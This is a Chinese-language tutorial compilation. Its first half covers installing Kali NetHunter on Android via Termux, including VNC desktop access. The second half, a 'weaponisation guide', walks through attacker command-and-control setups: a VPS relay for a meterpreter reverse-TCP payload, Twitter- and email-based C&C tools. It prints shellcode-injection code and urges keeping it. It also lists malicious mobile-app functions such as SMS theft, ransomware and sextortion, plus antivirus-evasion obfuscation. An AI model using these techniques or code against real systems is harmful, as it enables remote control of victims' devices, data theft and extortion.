中間需要的時(shí)間有點(diǎn)長(zhǎng)，請(qǐng)耐心等待。
第二個(gè)藍(lán)色句子意思大概是問(wèn)你安裝完要不要把安裝文件（rootfs）刪了？這里選擇y

安裝完成后，這就是最簡(jiǎn) gui?的安裝過(guò)程。然后執(zhí)行?nh?命令進(jìn)入?kali

打開(kāi) Termux 并輸入下面命令，命令 nethunter 可以縮寫為 nh?

nethunter? ? ? ? ? ? ? ? ? ? ? ?啟動(dòng)Kali NetHunter命令行界面
nethunter kex passwd?? ? ? 配置KeX密碼（僅在首次使用前需要）
nethunter kex &?? ? ? ? ? ? ? 啟動(dòng)Kali NetHunter桌面體驗(yàn)用戶會(huì)話
nethunter kex stop?? ? ? ? ? 停止Kali NetHunter桌面體驗(yàn)
nethunter <command>?? ? ? ? ? 在NetHunter環(huán)境中運(yùn)行
nethunter -r?? ? ? ? ? ? ? 以root身份啟動(dòng)Kali NetHunter
nethunter -r kex passwd?? ? ? 為root配置KeX密碼
nethunter -r kex &?? ? ? ? ? 以root身份啟動(dòng)Kali NetHunter Desktop Experience
nethunter -r kex stop?? ? ? 停止Kali NetHunter桌面體驗(yàn)根會(huì)話
nethunter -r kex kill?? ? ? 殺死所有KeX會(huì)話
nethunter -r <command>?? ? ? 以root身份在NetHunter環(huán)境中運(yùn)行 <command>

如果在后臺(tái)運(yùn)行 kex（ & ）而沒(méi)有設(shè)置密碼，再次設(shè)置密碼時(shí)，首先需要將其帶回前臺(tái)，通過(guò) fg <job id> -您可以稍后通過(guò) Ctrl + z 和 bg <job id> 再次將其發(fā)送到后臺(tái)。要使用 KeX，請(qǐng)啟動(dòng) KeX客戶端，輸入密碼并點(diǎn)擊連接提示：為了獲得更好的觀看體驗(yàn)，請(qǐng)?jiān)?KeX 客戶端的“高級(jí)設(shè)置”下輸入自定義分辨率。

安裝成功后

• 安裝后第一件事就是運(yùn)行 sudo apt update && sudo apt full-upgrade -y 來(lái)更新Kali。如果你有足夠的存儲(chǔ)空間，你可能也想運(yùn)行 sudo apt install -y kali-linux-default。或者運(yùn)行 kali-tweaks 來(lái)調(diào)整 kali 的元數(shù)據(jù)庫(kù)的群組，通過(guò)tab節(jié)點(diǎn)來(lái)調(diào)整選擇相關(guān)群組，選擇并apply。相關(guān)群組如下：
  System 系統(tǒng)組：https://www.kali.org/docs/general-use/metapackages/#system
  kali-linux-core: Base Kali Linux System – core items that are always included 系統(tǒng)基礎(chǔ)組件
  kali-linux-headless: Default install that doesn’t require GUI 不要求GUI則默認(rèn)安裝headless
  kali-linux-default: “Default” desktop (amd64/i386) images include these tools 默認(rèn)桌面
  kali-linux-arm: All tools suitable for ARM devices ARM設(shè)備全部工具集
  kali-linux-nethunter: Tools used as part of Kali NetHunter NetHunter工具集
  Desktop environments/Window managers 桌面環(huán)境/窗口管理：https://www.kali.org/docs/general-use/metapackages/#desktop-environmentswindow-managers
  kali-desktop-core: Any key tools required for a GUI image GUI核心組件
  kali-desktop-e17: Enlightenment (WM)
  kali-desktop-gnome: GNOME (DE)
  kali-desktop-i3: i3 (WM)
  kali-desktop-kde: KDE (DE)
  kali-desktop-lxde: LXDE (WM)
  kali-desktop-mate: MATE (DE)
  kali-desktop-xfce: Xfce (WM)
  Tools 工具：https://www.kali.org/docs/general-use/metapackages/#tools
  kali-tools-gpu: Tools which benefit from having access to GPU hardware 訪問(wèn)GPU硬件資源工具
  kali-tools-hardware: Hardware hacking tools 硬件hack工具
  kali-tools-crypto-stego: Tools based around Cryptography & Steganography 加密工具
  kali-tools-fuzzing: For fuzzing protocols fuzzing協(xié)議工具
  kali-tools-802-11: 802.11 (Commonly known as “Wi-Fi”) 無(wú)線協(xié)議工具
  kali-tools-bluetooth: For targeting Bluetooth devices 藍(lán)牙設(shè)備
  kali-tools-rfid: Radio-Frequency IDentification tools 無(wú)線射頻
  kali-tools-sdr: Software-Defined Radio tools 軟件定義無(wú)線工具
  kali-tools-voip: Voice over IP tools IP語(yǔ)音工具
  kali-tools-windows-resources: Any resources which can be executed on a Windows hosts 窗口資源
  kali-linux-labs: Environments for learning and practising on 實(shí)驗(yàn)室環(huán)境測(cè)試
  菜單：https://www.kali.org/docs/general-use/metapackages/#menu
  kali-tools-information-gathering: Used for Open Source Intelligence (OSINT) & information gathering 信息收集
  kali-tools-vulnerability: Vulnerability assessments tools 漏洞掃描
  kali-tools-web: Designed doing web applications attacks web攻擊
  kali-tools-database: Based around any database attacks 數(shù)據(jù)庫(kù)攻擊
  kali-tools-passwords: Helpful for password cracking attacks – Online & offline 在線/離線密碼攻擊
  kali-tools-wireless: All tools based around Wireless protocols – 802.11, Bluetooth, RFID & SDR 無(wú)線協(xié)議攻擊
  kali-tools-reverse-engineering: For reverse engineering binaries 逆向工程
  kali-tools-exploitation: Commonly used for doing exploitation 漏洞發(fā)現(xiàn)
  kali-tools-social-engineering: Aimed for doing social engineering techniques 社會(huì)化工程
  kali-tools-sniffing-spoofing: Any tools meant for sniffing & spoofing 嗅探工具
  kali-tools-post-exploitation: Techniques for post exploitation stage 漏洞工具
  kali-tools-forensics: Forensic tools – Live & Offline 取證工具
  kali-tools-reporting: Reporting tools 報(bào)告工具
  其他：https://www.kali.org/docs/general-use/metapackages/#others
  kali-linux-large: Our previous default tools for amd64/i386 images amd64/i386默認(rèn)工具集
  kali-linux-everything: Every metapackage and tool listed here 所有元數(shù)據(jù)和列出的工具
  kali-desktop-live: Used during a live session when booted from the image live啟動(dòng)盤
• 所有的滲透測(cè)試工具都應(yīng)該工作，但有些可能有限制，例如metasploit 沒(méi)有數(shù)據(jù)庫(kù)支持。
• 一些實(shí)用程序，如?top命令?不會(huì)運(yùn)行在unrooted手機(jī)。
• 非 root 用戶在 chroot 中仍然擁有 root 訪問(wèn)權(quán)限。這是使用 proot?實(shí)現(xiàn)的。
• 通過(guò)停止所有nethunter會(huì)話并在termux會(huì)話中鍵入以下內(nèi)容來(lái)執(zhí)行rootfs的定期備份： tar -cJf kali-arm64.tar.xz kali-arm64 && mv kali-arm64.tar.xz storage/downloads 這將把備份放在Android下載文件夾中。注：在舊設(shè)備上，將“arm 64”更改為“armhf”

關(guān)于 termux 安裝 kali| postgresql 報(bào)錯(cuò)：mainError: Data directory /var/lib/postgresql/15/main must not be owned by root

? ? ? ? ? ? ? ? sudo rm -rf /var/lib/dpkg/info/postgresql*?
? ? ? ? ? ? ? ? sudo dpkg --configure -a
? ? ? ? ? ? ? ? sudo apt update && sudo apt full-upgrade -y

termux 中 kali 本身不帶工具，如果想要完整版安裝，需要在啟動(dòng)?kali 后，在里面執(zhí)行下面命令，不過(guò)這需要大量磁盤空間：

? ? ? ? apt update
? ? ? ? apt full-upgrade -y
? ? ? ? apt install kali-linux-full ?或者 apt install kali-linux-default

執(zhí)行 apt list?可以列出所有工具。

安裝 Termux-api，去應(yīng)用商店或去官網(wǎng)下載安裝，或者?Termux 執(zhí)行：pkg install termux-api?，然后給 termux-api 權(quán)限就可以獲取對(duì)應(yīng)的手機(jī)信息了。

vnc 連接桌面

VNC是Virtual Network Computing（虛擬網(wǎng)絡(luò)計(jì)算機(jī)）的縮寫。就是遠(yuǎn)程控制你電腦的工具。（帶GNU圖形界面）支持linux、unix、Windows等操作系統(tǒng)。

termux 開(kāi)啟狀態(tài)才可以用 vnc

nh 是 nethunter 的縮寫，-r 代表 root 用戶，去了 -r 就是普通用戶

• nh kex passwd ? ?設(shè)置 VNC 密碼。nh -r kex passwd 設(shè)置 root 用戶使用?kex 的密碼
• nh -r kex & ? ? ?后臺(tái)啟動(dòng)桌面。(root用戶端口默認(rèn)5902，而普通用戶是5901，軟件nethunter kex 默認(rèn)5900 )
• 打開(kāi) NetHunter-KeX app
  ? ? ? ? 去掉 localhost:1后的:1，然后把端口號(hào)改為 5902
  ? ? ? ? 再然后，輸入密碼(用戶名可寫root)，點(diǎn)擊黑色按鈕 Connect進(jìn)行連接
• 關(guān)閉服務(wù)：在termux中執(zhí)行 nh -r kex kill 或 nh -r kex stop

關(guān)于 kali nethunter 使用 termux 代替默認(rèn)終端的方案：https://blog.csdn.net/AA1234567890_/article/details/122974973

Windows VNC Viewer無(wú)法連接Android上Kali NetHunter Kex遠(yuǎn)程桌面的一種解決辦法

：https://zhuanlan.zhihu.com/p/560172905

上面通過(guò)?termux?開(kāi)啟?vnc?服務(wù)，也可以直接進(jìn)入?kali，在?kali 中啟動(dòng)?vnc

kali 配置VNC ( kali 自帶 tightvncserver?)：https://www.cnblogs.com/zroCrow/p/16183209.html

方法 2：https://github.com/Hax4us/Nethunter-In-Termux

安裝：

在HOME 目錄中下載腳本curl -LO https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter
添加執(zhí)行權(quán)限 chmod +x kalinethunter
運(yùn)行腳本 ? ? ./kalinethunter

In Case Of SSL error: certificate verify failed。執(zhí)行命令：./kalinethunter --insecure

用法：

? ? ? ? 執(zhí)行命令 startkali 啟動(dòng) nethunter。默認(rèn)用戶名和密碼都是 kali
? ? ? ? 如果想以 root 用戶啟動(dòng) nethunter 則執(zhí)行命令：startkali -r

VNC 手冊(cè)：

? ? ? ? 開(kāi)始一個(gè) VNC 會(huì)話：vnc start
? ? ? ? 停止一個(gè) VNC 會(huì)話：vnc stop
? ? ? ? 查看 VNC 狀態(tài)( Display and port number)：vnc status
? ? ? ? 啟動(dòng)vnc start則默認(rèn)會(huì)開(kāi)啟 vncserver 。
? ? ? ? ? ? kali 用戶啟動(dòng)后：DISPLAY=:2 & PORT=5902
? ? ? ? ? ? root 用戶啟動(dòng)后：DISPLAY=:1 & PORT=5901

啟動(dòng) LXDE 桌面

默認(rèn)的?DESKTOP?是?XFCE4，但是也可以設(shè)置?LXDE?作為桌面：https://www.hax4us.com/2018/07/how-to-install-lxde-in-kali-nethunter.html?m=1

安裝完成后，啟動(dòng)進(jìn)入kali：startkali

安裝?VNC?服務(wù)

進(jìn)入kali 后，root 權(quán)限下執(zhí)行：sudo?wget https://raw.githubusercontent.com/EXALAB/AnLinux-Resources/master/Scripts/DesktopEnvironment/Apt/Xfce4/de-apt-xfce4.sh && bash de-apt-xfce4.sh

執(zhí)行 vncserver-start 后，輸入密碼一個(gè)自定密碼即可。

打開(kāi)? vnc 的 APP，像這樣設(shè)置

要在Termux上安裝xfce4桌面環(huán)境，可以按照以下步驟進(jìn)行操作：
首先，確保你的Termux已經(jīng)安裝了必要的軟件包。你可以使用以下命令安裝所需的軟件包： pkg install x11-repo python openbox pypanel xorg-xsetroot aterm
接下來(lái)，你需要安裝PyXDG庫(kù)。你可以使用以下命令安裝： pip3 install PyXDG
然后，你可以使用以下命令下載并運(yùn)行安裝腳本：?
wget https://raw.githubusercontent.com/EXALAB/AnLinux-Resources/master/Scripts/DesktopEnvironment/Apt/Xfce4/de-apt-xfce4.sh && bash de-apt-xfce4.sh
安裝完成后，你可以啟動(dòng)xfce4桌面環(huán)境。你可以使用以下命令啟動(dòng)xfce4： startxfce4

注意，這只是一種在Termux上安裝xfce4桌面環(huán)境的方法。還有其他方法可以安裝Linux系統(tǒng)，如proot-distro等。你可以在GitHub上找到更多的項(xiàng)目來(lái)參考

5、ARM 設(shè)備 武器化指南

ARM 設(shè)備 武器化指南 --- 上手實(shí)操：https://www.anquanke.com/post/id/205455#h2-4

在滲透測(cè)試流程中，實(shí)施人員可以嘗試?yán)肳IFI和USB連接，將移動(dòng)安全小組提供的移動(dòng)端 RAT 植入到目標(biāo)移動(dòng)終端中，這里稍微具體一些、展開(kāi)講下。

C&C 服務(wù)器

C&C服務(wù)器：https://blog.csdn.net/laowu8615/article/details/78181032

C&C服務(wù)器，其全稱為 command and control server。C&C服務(wù)器不僅可以為攻擊者提供便利的資源管理平臺(tái)，也可以保障其個(gè)人隱私安全。現(xiàn)在通過(guò)幾個(gè)C&C服務(wù)器的搭建實(shí)驗(yàn)了解一下什么是C&C服務(wù)器，以了解如何應(yīng)對(duì)利用C&C的攻擊行為。

無(wú) C&C服務(wù)器 通訊

某天，某攻擊者通過(guò)固定的外網(wǎng)IP控制了一個(gè)外部的外網(wǎng)用戶。兩臺(tái)設(shè)備的交流完全是點(diǎn)對(duì)點(diǎn)交流的，并且交流方式是主動(dòng)式交流。

由于該用戶由購(gòu)買了幾臺(tái)電腦，一個(gè)IP已經(jīng)不夠用了，所以就在家里面配置了一臺(tái)路由器。雖然用戶可以訪問(wèn)外網(wǎng)，但是這樣就導(dǎo)致用戶所有的電腦設(shè)備都處在一個(gè)內(nèi)網(wǎng)中。攻擊者沒(méi)有辦法控制用戶的電腦，所以又入侵了他的路由器做了一個(gè)端口轉(zhuǎn)發(fā)，然后繼續(xù)控制該用戶。

VPN C&C服務(wù)器 通訊

隨后該攻擊者發(fā)現(xiàn)自己的外網(wǎng)IP屬于動(dòng)態(tài)IP地址。只要一斷線，IP地址就會(huì)改變。為了能夠持久的進(jìn)行監(jiān)聽(tīng)會(huì)話，攻擊者租用了一臺(tái)VPS服務(wù)器，在上面搭建了一個(gè)pptp代理，隨后用 iptable 做了端口轉(zhuǎn)發(fā)，并且將交流方式改為反彈式交流。

技術(shù)解析：有的時(shí)候，地方寬帶運(yùn)營(yíng)商會(huì)有各種各樣的規(guī)則，這樣將會(huì)導(dǎo)致控制端的網(wǎng)絡(luò)非常不穩(wěn)定。記得我在2012年的時(shí)候是使用電信的寬帶對(duì)后門進(jìn)行控制，但是電信給我的IP屬于一個(gè)內(nèi)網(wǎng)IP。隨后打電話給客服改成公網(wǎng)IP，但是這個(gè)IP是動(dòng)態(tài)的，每天都在變化。這樣復(fù)雜的網(wǎng)絡(luò)環(huán)境，攻擊者需要一個(gè)穩(wěn)定和安全的C&C服務(wù)器。

以下為本次實(shí)驗(yàn)的環(huán)境：

win 10 一臺(tái)

Kali Linux 一臺(tái)

Linode VPS 一個(gè)

在這里，我們先使用Kali Linux作為控制端，win 10則為病毒感染的設(shè)備，而VPS則作為一個(gè)C&C服務(wù)器。首先在Linode上租用一臺(tái) VPS，我們可以看到這臺(tái)VPS的公網(wǎng)IP為139.162.5.124。

為了方便教程，我使用Veil編譯一個(gè)meterpreter的payload。其設(shè)置如下

監(jiān)聽(tīng)I(yíng)P：139.162.5.124（VPS的公網(wǎng)IP）

監(jiān)聽(tīng)端口：1024（隨意填寫）

Payload種類：python/meterpreter/rev_tcp

加密方式：Pyherion

然后需要對(duì) VPS 進(jìn)行一個(gè)簡(jiǎn)單的設(shè)置，通過(guò) SSH 連接 VPS，然后進(jìn)行 update。

隨后安裝pptp的基本組件

對(duì)/etc/pptpd.conf文件進(jìn)行編輯，添加Local IP地址和remote IP地址。

localip 192.168.0.1

remoteip 192.168.0.2

然后編輯/etc/ppp/chap-secrets文件，設(shè)置pptp的賬號(hào)和密碼。

freebuf pptpd freebuf *

然后再編輯 /etc/ppp/options 文件，將 ms-dns 設(shè)置為根服務(wù)器地址，如 8.8.8.8 之類的。

再繼續(xù)編輯/etc/ppp/options文件，添加net.ipv4.ip_forward=1，其意義是使IP能夠轉(zhuǎn)發(fā)。保存后可以使用sysctl -p檢查一下。

輸入命令 /etc/init.d/pptpd restart，讓pptp服務(wù)重啟，然后安裝iptable，并且設(shè)置相關(guān)命令。

iptable安裝：apt-get install iptables
iptable設(shè)置：
? ? ? ? 1. iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -o eth0 -j MASQUERADE
? ? ? ? 2. iptables-save > /etc/iptables.pptp
? ? ? ? 3. cd /etc/network/if-up.d/
? ? ? ? 4. vi iptables
寫入以下內(nèi)容
#!/bin/sh
iptables-restore < /etc/iptables.pptp

5. chmod +x /etc/network/if-up.d/iptables

到目前這一步 pptp 已經(jīng)可以連接到外網(wǎng)了，但是還不夠，我們需要對(duì)其進(jìn)行端口轉(zhuǎn)發(fā)。大家可以使用iptable繼續(xù)來(lái)做端口轉(zhuǎn)發(fā)，或者使用rinetd之類的端口轉(zhuǎn)發(fā)工具。

安裝 rinetd：sudo apt-get install rinetd

然后編輯 /etc/rinetd.conf文件，寫入0.0.0.0 1204 192.168.0.2 1204。其意義是把所有通過(guò)1024端口連接本機(jī)的IP映射到內(nèi)網(wǎng)IP中的1024端口。

保存之后可以重啟rinetd服務(wù)器，或者通過(guò)pkill命令關(guān)閉rinetd，然后通過(guò)該命令”rinetd -c /etc/rinetd.conf“調(diào)用剛才保存的conf文件開(kāi)啟rinetd程序。

對(duì)Kali中PPTP的連接做一下更改，主要是使用MPPE點(diǎn)對(duì)點(diǎn)加密連接，并且不發(fā)送PPP響應(yīng)數(shù)據(jù)包。

VPN 連接沒(méi)什么問(wèn)題

然后打開(kāi)Metasploit，找到handler，并且對(duì)其進(jìn)行設(shè)置。

監(jiān)聽(tīng)I(yíng)P：192.168.0.2

監(jiān)聽(tīng)端口：1024

在win10客戶端激活木馬，然后可以看到handler和payload已經(jīng)成功搭建起了會(huì)話。

也許教程有點(diǎn)繞，但是技術(shù)邏輯很清晰。首先是后門持續(xù)對(duì)VPS進(jìn)行監(jiān)聽(tīng)，而VPS則是把被監(jiān)聽(tīng)端口的流量轉(zhuǎn)發(fā)到自己的內(nèi)網(wǎng)IP上，而客戶端在連接到VPN后對(duì)這個(gè)內(nèi)網(wǎng)IP進(jìn)行監(jiān)聽(tīng)即可。

如下圖所示：

Web C&C服務(wù)器 通信

慢慢的，VPS服務(wù)器商場(chǎng)發(fā)現(xiàn)攻擊者把一臺(tái)VPS服務(wù)器當(dāng)作C&C服務(wù)器。這個(gè)攻擊者就思考得改變一下數(shù)據(jù)交流的方式，于是用微博當(dāng)作C&C服務(wù)器。后門程序和控制程序內(nèi)置爬蟲(chóng)腳本，通過(guò)XPath參數(shù)或者其它參數(shù)抓取微博中的內(nèi)容，將其當(dāng)作控制命令。

技術(shù)解析：這個(gè)最能拿來(lái)當(dāng)作例子的應(yīng)該是twitter，實(shí)際上攻擊者依靠twitter當(dāng)作C&C服務(wù)器早就不是新聞，比如2015年新聞《俄羅斯攻擊者是如何濫用twitter作為Hammertoss C&C服務(wù)器的？》。還有的攻擊者入侵Discuz論壇，把該論壇當(dāng)作其C&C服務(wù)器。這種開(kāi)放式的C&C有些是直接分析HTML代碼，將特定的參數(shù)值當(dāng)作命令進(jìn)行處理，有些則是讀取json數(shù)據(jù)等。

在GitHub上公布了一個(gè)開(kāi)源的twitter后門程序，其項(xiàng)目名稱叫做twittor。

項(xiàng)目地址：Twittor

這個(gè)項(xiàng)目的主要文件如下

implant.py

requirements.txt

twittor.py

看GitHub的官方設(shè)置，我們是到Twitter中創(chuàng)建一個(gè)application，并且通過(guò)pip安裝requirement.txt里面的一些組件。

創(chuàng)建applocation還好理解，因?yàn)樵趇mplant.py文件中，它需要twitter的username，token和secret等參數(shù)來(lái)發(fā)送推文。

至于requirements.txt中只有一個(gè)python的第三方庫(kù)需要安全，就是tweepy庫(kù)。這個(gè)庫(kù)主要功能是和twitter的API建立通訊。

觀察implant.py，該文件調(diào)用了以下模塊

from tweepy import Stream

from tweepy import OAuthHandler

from tweepy import API

from tweepy.streaming import StreamListener

from uuid import getnode as get_mac

import ctypes

import json

import threading

import subprocess

import base64

import platform

tweepy我們已經(jīng)說(shuō)過(guò)了，是關(guān)于twitter API通訊模塊，而json模塊主要是對(duì)json進(jìn)行解析。而uuid模塊主要是獲取目標(biāo)機(jī)器的MAC地址的。ctypes庫(kù)主要是提供和C語(yǔ)言兼容的數(shù)據(jù)類型，可以很方便地調(diào)用C DLL中的函數(shù)，這樣可以很方便和meterpreter兼容起來(lái)。該文件還調(diào)用了threading庫(kù)，這樣可以進(jìn)行多線程任務(wù)。同時(shí)也調(diào)用了subprocess，這樣可以創(chuàng)建多個(gè)子線程。base64庫(kù)主要是對(duì)數(shù)據(jù)進(jìn)行base64位轉(zhuǎn)碼，比如中文等等之類的。而platform庫(kù)主要是查看其操作系統(tǒng)的類型，版本號(hào)等系統(tǒng)信息。

先創(chuàng)建twitter的key和access token。

然后開(kāi)啟可讀可寫權(quán)限

把各種token和secret填寫到payload和handler內(nèi)。

但是運(yùn)行的時(shí)候卻報(bào)錯(cuò)了。

google上有人說(shuō)到，tweepy項(xiàng)目的某個(gè)人原本想用update_status做一個(gè)開(kāi)始的連接測(cè)試，以保證自己編譯的代碼可以正常訪問(wèn)google API。但是在tweepy開(kāi)發(fā)的過(guò)程中，不注意把這個(gè)參數(shù)作為了一個(gè)首要條件，導(dǎo)致所有凡是要調(diào)用tweepy庫(kù)發(fā)推的人必須要先驗(yàn)證update_status。

只能在twiitor.py里面調(diào)用一下tweepy，然后寫入api.update_status(status=m)，不過(guò)測(cè)試的時(shí)候還是爆出相同的錯(cuò)誤。

但是當(dāng)我運(yùn)行twittor.py的時(shí)候的確是可以收到信息的，這個(gè)就尷尬了。

google搜索沒(méi)有結(jié)果，于是慢慢查看官方文檔，最終找到了問(wèn)題的出處。原來(lái)twitter官方已經(jīng)不允許使用direct_message命令，同時(shí)也表示一個(gè)user token不允許在第三方平臺(tái)登陸。

而我們代碼內(nèi)剛好就有一個(gè)direct_messages命令。估計(jì)twitter最近也是被twitter僵尸網(wǎng)絡(luò)折磨怕了，才會(huì)出現(xiàn)相關(guān)規(guī)則。

精力有限，如果要讓這個(gè)C&C上線，需要查看twitter官方文檔，重新編寫代碼了。這個(gè)C&C的精華之處在于它把所有的所有的數(shù)據(jù)轉(zhuǎn)換成base64位進(jìn)行傳播，并且可以插入任意shellcode的數(shù)據(jù)片到內(nèi)存值中。也就是說(shuō)，當(dāng)該后門被激活的時(shí)候，你甚至可以插入meterpreter的shellcode。這個(gè)功能的核心代碼為以下部分：

class ExecuteShellcode(threading.Thread):

    def __init__(self, jobid, shellc):

        threading.Thread.__init__(self)

        self.shellc = shellc

        self.jobid = jobid

        self.daemon = True

        self.start()

    def run(self):

        try:

            shellcode = bytearray(self.shellc)

            ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

                ctypes.c_int(len(shellcode)),

                ctypes.c_int(0x3000),

                ctypes.c_int(0x40))

            buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

            ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))

            ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),

                ctypes.c_int(0),

                ctypes.c_int(ptr),

                ctypes.c_int(0),

                ctypes.c_int(0),

                ctypes.pointer(ctypes.c_int(0)))

            ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))

        except Exception as e:

            print e

            pass

具體的實(shí)現(xiàn)功能如下圖所示：

如果有人要重新編寫這個(gè)C&C，一定要加上這個(gè)功能??！

Email C&C服務(wù)器 通訊

但是好景不長(zhǎng)，有些攻擊者發(fā)現(xiàn)這個(gè)微博號(hào)一直發(fā)一些奇怪的內(nèi)容，深度挖掘之后發(fā)現(xiàn)這個(gè)微博號(hào)是一個(gè)C&C服務(wù)器。于是攻擊者決定要搞一個(gè)絕對(duì)安全的C&C服務(wù)器，于是該攻擊者決定在后門程序內(nèi)加入smtp連接代碼。從此該攻擊者有了快樂(lè)開(kāi)心的“抓雞”生活。

技術(shù)解析：在“油管”上看到某個(gè)人錄制的視頻，代碼也非常簡(jiǎn)單，很適合教學(xué)，于是便引用他的代碼來(lái)進(jìn)行講解。他的后面程序是基于python來(lái)編寫的。

文件下載下來(lái)后，發(fā)現(xiàn)有兩個(gè)主要程序一個(gè)主要目錄。

implant.py：payload

gcat.py：控制端

data目錄：數(shù)據(jù)存放路徑

先看看 implant.py，在1至15行我們可以看到這個(gè)后門程序調(diào)用了以下的python模塊。

以下是gcat.py調(diào)用的模塊。模塊功能我不做描述了，請(qǐng)自行g(shù)oogle。但是有幾個(gè)模塊是十分重要的，就是emai, imaplib和json模塊。這里主要是負(fù)責(zé)處理email的管理，連接，以及編碼和解碼郵件json數(shù)據(jù)。

兩個(gè)模塊都有以下四個(gè)主要常量，分別是郵箱號(hào)，密碼，smtp服務(wù)器地址，和smtp端口。

然后我們一邊操作一遍講解相關(guān)代碼吧。我們?cè)谶@里是使用Veil-Evasion 的auxiliary/pyinstaller_wrapper組件進(jìn)行編譯。

PYTHON_SOURCE填寫上implant.py的路徑。

文件名我就叫C&C吧，然后選擇默認(rèn)的編譯方式。

編譯好后我復(fù)制到windows系統(tǒng)上，然后雙擊運(yùn)行。

這時(shí)email收到了一份郵件，里面有我的系統(tǒng)進(jìn)程，系統(tǒng)版本等詳細(xì)信息。

通過(guò)payload代碼中第504行開(kāi)始(sendEmail Class)，我們可以知道這里就是發(fā)送郵件的地方。首先該程序會(huì)以這個(gè)會(huì)話的ID為發(fā)件人發(fā)一封郵件到payload設(shè)置的郵箱里面。我們可以確定整個(gè)程序編譯是沒(méi)有任何問(wèn)題的。

繼續(xù)往下看看控制端程序（gcat.py）。從235行開(kāi)始，我們可以知道它的全部命令。

往上繼續(xù)看，原來(lái)這個(gè)data目錄主要是存儲(chǔ)屏幕截圖的。

但是當(dāng)我準(zhǔn)備輸入-list的時(shí)候出錯(cuò)了。連接居然超時(shí)了，這個(gè)很不正常??！重新瀏覽了兩個(gè)python腳本的代碼，都正確啊。

當(dāng)時(shí)我的內(nèi)心是大寫的崩潰。不怕代碼出錯(cuò)誤，就怕出了錯(cuò)誤不知道在哪里。Google 的時(shí)候發(fā)現(xiàn)了這么一個(gè)東西。OMG！我設(shè)置的兩個(gè)賬號(hào)都是QQ和163的，原來(lái)是這個(gè)原因。

后面得知Gmail沒(méi)問(wèn)題。做做實(shí)驗(yàn)還可以，要實(shí)際使用就不行了，因?yàn)镚mail在國(guó)內(nèi)早被墻了。要解決這個(gè)問(wèn)題也可以，就是用php腳本進(jìn)行編譯，因?yàn)镼Q，163等對(duì)于php的郵箱模塊支持沒(méi)什么問(wèn)題。這里就不繼續(xù)講解了，文章主要是做一個(gè)演示的作用。

Email C&C服務(wù)器相關(guān)代碼：https://github.com/byt3bl33d3r/gcat

勒索、遠(yuǎn)控、APT

流? 程

新手在學(xué)習(xí) MetaSploit 時(shí)，也會(huì)照著書中的案例依葫蘆畫瓢：

• 生成一個(gè)惡意 apk
• 給 apk 簽名
• 讓目標(biāo)來(lái)安裝

這樣就可以收到目標(biāo)回傳的信息，實(shí)施更多的控制。當(dāng)然現(xiàn)實(shí)世界的進(jìn)攻會(huì)非常復(fù)雜和依賴于各種環(huán)境和條件的限制，不過(guò)不得不承認(rèn)，進(jìn)攻的本質(zhì)確實(shí)是這三條，分別對(duì)應(yīng)：

• 完成惡意應(yīng)用的具體功能模塊
• 通過(guò)各種免殺技術(shù)使App可以存活并運(yùn)行
• 各顯神通去誘騙 目標(biāo)(受害者) 下載、安裝和使用

功能：遠(yuǎn)控、上傳、勒索、加密

哪些功能是惡意應(yīng)用必備的呢？

最起碼聯(lián)絡(luò)cc，通過(guò)服務(wù)端下發(fā)指令并執(zhí)行要有吧：

獲取并上傳用戶短信：

通過(guò) Accessibility Service 直接操作模擬點(diǎn)擊手機(jī)界面：

上傳用的定位、串號(hào)、手機(jī)狀態(tài)等信息：

上述這些只是冰山一角，如果配合root可以做到對(duì)其他應(yīng)用如手機(jī)瀏覽器進(jìn)行注入，啟動(dòng)用戶手機(jī)指定App，刪除指定應(yīng)用，更新惡意插件等惡意行為。

當(dāng)然現(xiàn)在的手機(jī)想要root是非常困難了，但并不妨礙很多高級(jí)APT團(tuán)伙使用0day或1day來(lái)開(kāi)發(fā)Exploit進(jìn)行遠(yuǎn)程root，這就需要更為昂貴的投入和深厚的技術(shù)功底了。這也是為何現(xiàn)在的APT頻頻有國(guó)家隊(duì)作為背后支撐的原因。

當(dāng)然在社會(huì)上被廣泛使用的還是比較低級(jí)的加密、鎖機(jī)、或者上傳視頻進(jìn)行勒索。

當(dāng)然不要小看這些低級(jí)技術(shù)的危害，比如我們的時(shí)間管理大師——羅志祥就曾經(jīng)在這上面栽過(guò)跟頭：早期羅志祥與網(wǎng)友裸聊畫面曝光 曾上節(jié)目哭訴辯解。

不排除甲方老板也好這一口，對(duì)吧。比如有些人表面上在白天他是演員，其實(shí)到了晚上他是運(yùn)動(dòng)員。社工很多時(shí)候是真的比0day、1day好用。

在內(nèi)網(wǎng)把各種資料都搜集到了之后，如何不走網(wǎng)關(guān)不動(dòng)聲色地上傳到cc呢？這就用到前文講的手機(jī)卡流量逃逸了。

傳統(tǒng)免殺技術(shù)：混淆、加密、VMP

這部分其實(shí)跟App加固是重合的，因?yàn)樵硎且荒Ｒ粯拥摹?/p>

前者的目標(biāo)是保護(hù)App不被逆向破解者給分析，后者是為了掩蓋特征，逃過(guò)殺軟或者行為管理軟件的識(shí)別。

你用msf生成一個(gè)payload，啥也不干就發(fā)到對(duì)方機(jī)器上，那就等于去送人頭，不殺你殺誰(shuí)呢？或者攻擊團(tuán)隊(duì)煞費(fèi)苦心開(kāi)發(fā)了好幾個(gè)月的木馬，啥也不防就發(fā)過(guò)去，其實(shí)就是給防守團(tuán)隊(duì)送源碼去的。

總得混淆、加密甚至上個(gè)VMP保護(hù)下吧，雖然還是會(huì)被病毒分析人員分析，并且肯定會(huì)被扒個(gè)底朝天，但是惡心他一下也好啊。

這部分技術(shù)非常多，這里主要也就是給個(gè)索引，大家有興趣可以自行深入分析。

混淆：

資源混淆：https://github.com/shwenzhang/AndResGuard/blob/master/README.zh-cn.md

代碼混淆。
? ? ? ? Java混淆：字符串加解密、免費(fèi)的ProGuard和商業(yè)版DexGuard
? ? ? ? Native混淆：Ollvm、字符串混淆、自主混淆器libsgmain

反反編譯器：

花指令。

重打包對(duì)抗：對(duì)抗 jd-gui、dex2jar、baksmali、shakaapktool、androguard

反調(diào)試：

17種反調(diào)試收集：https://bbs.pediy.com/thread-223460.htm

